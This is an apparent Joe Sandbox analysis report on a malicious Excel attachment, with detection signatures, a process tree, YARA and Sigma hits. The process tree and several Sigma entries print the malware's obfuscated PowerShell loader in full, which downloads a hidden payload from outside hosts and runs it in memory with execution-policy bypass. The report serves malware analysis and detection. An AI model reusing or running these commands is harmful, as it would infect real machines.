Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Pedido No 4500924462.xls

Overview

General Information

Sample name:Pedido No 4500924462.xls
Analysis ID:1563998
MD5:456ff43e8b42a2043afc83c4474872d5
SHA1:a18cb477550dc4eda2e5f0d22b2ffb5a71dbeb13
SHA256:ae99e5fea931ceed4641e248fc8f06fb314d4c12111b92871e6bf45c69d93188
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3208 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 3472 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3812 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3880 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhKZjVpbWFnZUJ5dCcrJ2VzKTtKZjVzdGFydEZsYWcgPSA3WmE8PEJBU0U2NF9TVEFSVD4nKyc+N1phO0pmNWVuZEZsYWcgJysnPSA3WmE8PEJBU0U2NF9FTkQ+PjdaYTtKZjVzdGFydEluZGV4ID0gSmY1aW1hZ2VUZXh0JysnLkluZGV4T2YoSmY1c3RhcnRGbGFnKTtKZjVlbmRJbmRleCA9IEpmNWltYWdlVGV4dC5JbmRleE9mKEonKydmNWVuZEZsYWcpO0pmNXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBKZjVlbmRJbmQnKydleCAtZ3QgSmY1c3RhcnRJbmRleDtKZjVzdGFydEluZGV4ICs9IEpmNXN0YXJ0RmxhZy5MZW5ndCcrJ2g7SmY1YmFzZTY0TGVuZ3RoID0gSmYnKyc1ZW5kSW5kZXggLSBKZjUnKydzdGFydEluZCcrJ2V4O0pmNWJhc2U2NENvbW1hbmQgPScrJyBKZjUnKydpbWFnZVRleHQuU3Vic3RyaW5nKEpmNXN0YXJ0SW5kZXgsIEpmNWJhJysnc2U2NExlbmd0aCk7SmY1YmFzZTYnKyc0UmV2ZXJzZWQgPSAtaicrJ29pbiAoSmY1YmFzZTYnKyc0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFFHMCBGb3JFYWNoLU9iamVjdCcrJyB7IEpmNV8gfSlbLTEuLi0oSmY1JysnYmFzJysnZTY0Q29tbWFuZC5MZW5ndGgpXTtKZjVjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKEpmNWJhc2U2NFJldmVyc2VkKTtKZjVsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseScrJ106OkxvYWQoSmY1Y29tbWFuZEJ5dGVzKTtKZjV2YWlNZXRob2QnKycgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDdaYVZBSTdaYSk7SmY1dmFpTWV0aG9kLkludm9rZShKZjVudWxsLCBAKDdaYXR4dC5SVENDQ1JWLzYyMi81MTIuODIxLjU5LjMyLy86cCcrJ3R0aDdaYSwgN1phZGVzYXRpdmFkbzdaYSwgN1phZGVzYXQnKydpdmFkbzdaYSwgN1phZGVzYXRpdicrJ2FkbzdaYSwgN1phYXMnKydwbmUnKyd0X2NvbXBpbGVyN1phLCA3WmFkZXNhdGl2YWRvN1phLCA3WmFkZXNhdGl2YWRvN1phLDdaJysnYWRlc2F0aXZhZCcrJ283WmEsN1phJysnZGVzYXQnKydpdmFkbzdaYSw3WmFkZXNhJysndGl2YWRvN1phLDdaYWRlc2F0aXZhZG83WmEsN1phZGVzYXRpdmEnKydkbzdaYSw3WmExN1phLDdaYWRlc2F0aXZhZG83WmEpKTsnKS5SRVBsQWNlKCdKZjUnLFtTdHJpTkddW0NoQVJdMzYpLlJFUGxBY2UoJzdaYScsW1N0cmlOR11bQ2hBUl0zOSkuUkVQbEFjZSgoW0NoQVJdODErW0NoQVJdNzErW0NoQVJdNDgpLFtTdHJpTkddW0NoQVJdMTI0KSB8IC4oICRwc2hPbUVbMjFdKyRwU0hPbWVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 4024 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestof[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x146d:$obj2: \objdata
  • 0x1453:$obj3: \objupdate
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B7AFCBA1.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x146d:$obj2: \objdata
  • 0x1453:$obj3: \objupdate

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3924INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x47036:$b2: ::FromBase64String(
  • 0x4769c:$b2: ::FromBase64String(
  • 0x480ff:$b2: ::FromBase64String(
  • 0x492e3:$b2: ::FromBase64String(
  • 0x49a43:$b2: ::FromBase64String(
  • 0x4a33f:$b2: ::FromBase64String(
  • 0x4aa24:$b2: ::FromBase64String(
  • 0x11ad3e:$b2: ::FromBase64String(
  • 0x23b26:$b3: ::UTF8.GetString(
  • 0x244b7:$b3: ::UTF8.GetString(
  • 0x25035:$b3: ::UTF8.GetString(
  • 0x25b87:$b3: ::UTF8.GetString(
  • 0x43a1b:$b3: ::UTF8.GetString(
  • 0x46dc6:$b3: ::UTF8.GetString(
  • 0x4742c:$b3: ::UTF8.GetString(
  • 0x47e8f:$b3: ::UTF8.GetString(
  • 0x49073:$b3: ::UTF8.GetString(
  • 0x497d3:$b3: ::UTF8.GetString(
  • 0x4a0cf:$b3: ::UTF8.GetString(
  • 0x4a7b4:$b3: ::UTF8.GetString(
  • 0x50216:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 4024JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 4024INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x337c8:$b2: ::FromBase64String(
    • 0x5491a:$b2: ::FromBase64String(
    • 0x54ff4:$b2: ::FromBase64String(
    • 0x56777:$b2: ::FromBase64String(
    • 0x5827c:$b2: ::FromBase64String(
    • 0x58956:$b2: ::FromBase64String(
    • 0xcfaff:$b2: ::FromBase64String(
    • 0xd01d0:$b2: ::FromBase64String(
    • 0xd4d8b:$b2: ::FromBase64String(
    • 0xd5c3f:$b2: ::FromBase64String(
    • 0xee8d3:$b2: ::FromBase64String(
    • 0x10e40e:$b2: ::FromBase64String(
    • 0x159327:$b2: ::FromBase64String(
    • 0x159a00:$b2: ::FromBase64String(
    • 0x15f740:$b2: ::FromBase64String(
    • 0x175d52:$b2: ::FromBase64String(
    • 0x18e8a7:$b2: ::FromBase64String(
    • 0x1b7fa1:$b2: ::FromBase64String(
    • 0x1b8f6f:$b2: ::FromBase64String(
    • 0x1ba7c3:$b2: ::FromBase64String(
    • 0x1d8c8f:$b2: ::FromBase64String(

    Sigma Signatures

    Exploits

    barindex
    Sigma detected: EQNEDT32.EXE connecting to internet
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 23.95.128.215, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3812, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49174
    Sigma detected: File Dropped By EQNEDT32EXE
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3812, TargetFilename: C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs

    System Summary

    barindex
    Sigma detected: Base64 Encoded PowerShell Command Detected
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhKZjVpbWFnZUJ5dCcrJ2VzKTtKZjVzdGFydEZsYWcgPSA3WmE8PEJBU0U2NF9TVEFSVD4nKyc+N1phO0pmNWVuZEZsYWcgJysnPSA3WmE8PEJBU0U2NF9FTkQ+PjdaYTtKZjVzdGFydEluZGV4ID0gSmY1aW1hZ2VUZXh0JysnLkluZGV4T2YoSmY1c3RhcnRGbGFnKTtKZjVlbmRJbmRleCA9IEpmNWltYWdlVGV4dC5JbmRleE9mKEonKydmNWVuZEZsYWcpO0pmNXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBKZjVlbmRJbmQnKydleCAtZ3QgSmY1c3RhcnRJbmRleDtKZjVzdGFydEluZGV4ICs9IEpmNXN0YXJ0RmxhZy5MZW5ndCcrJ2g7SmY1YmFzZTY0TGVuZ3RoID0gSmYnKyc1ZW5kSW5kZXggLSBKZjUnKydzdGFydEluZCcrJ2V4O0pmNWJhc2U2NENvbW1hbmQgPScrJyBKZjUnKydpbWFnZVRleHQuU3Vic3RyaW5nKEpmNXN0YXJ0SW5kZXgsIEpmNWJhJysnc2U2NExlbmd0aCk7SmY1YmFzZTYnKyc0UmV2ZXJzZWQgPSAtaicrJ29pbiAoSmY1YmFzZTYnKyc0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFFHMCBGb3JFYWNoLU9iamVjdCcrJyB7IEpmNV8gfSlbLTEuLi0oSmY1JysnYmFzJysnZTY0Q29tbWFuZC5MZW5ndGgpXTtKZjVjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKEpmNWJhc2U2NFJldmVyc2VkKTtKZjVsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseScrJ106OkxvYWQoSmY1Y29tbWFuZEJ5dGVzKTtKZjV2YWlNZXRob2QnKycgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDdaYVZBSTdaYSk7SmY1dmFpTWV0aG9kLkludm9rZShKZjVudWxsLCBAKDdaYXR4dC5SVENDQ1JWLzYyMi81MTIuODIxLjU5LjMyLy86cCcrJ3R0aDdaYSwgN1phZGVzYXRpdmFkbzdaYSwgN1phZGVzYXQnKydpdmFkbzdaYSwgN1phZGVzYXRpdicrJ2FkbzdaYSwgN1phYXMnKydwbmUnKyd0X2NvbXBpbGVyN1phLCA3WmFkZXNhdGl2YWRvN1phLCA3WmFkZXNhdGl2YWRvN1phLDdaJysnYWRlc2F0aXZhZCcrJ283WmEsN1phJysnZGVzYXQnKydpdmFkbzdaYSw3WmFkZXNhJysndGl2YWRvN1phLDdaYWRlc2F0aXZhZG83WmEsN1phZGVzYXRpdmEnKydkbzdaYSw3WmExN1phLDdaYWRlc2F0aXZhZG83WmEpKTsnKS5SRVBsQWNlKCdKZjUnLFtTdHJpTkddW0NoQVJdMzYpLlJFUGxBY2UoJzdaYScsW1N0cmlOR11bQ2hBUl0zOSkuUkVQbEFjZSgoW0NoQVJdODErW0NoQVJdNzErW0NoQVJdNDgpLFtTdHJpTkddW0NoQVJdMTI0KSB8IC4oICRwc2hPbUVbMjFdKyRwU0hPbWVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBb
    Sigma detected: Equation Editor Network Connection
    Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49174, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3812, Protocol: tcp, SourceIp: 23.95.128.215, SourceIsIpv6: false, SourcePort: 80
    Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
    Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5co
    Sigma detected: Potential PowerShell Command Line Obfuscation
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5co
    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
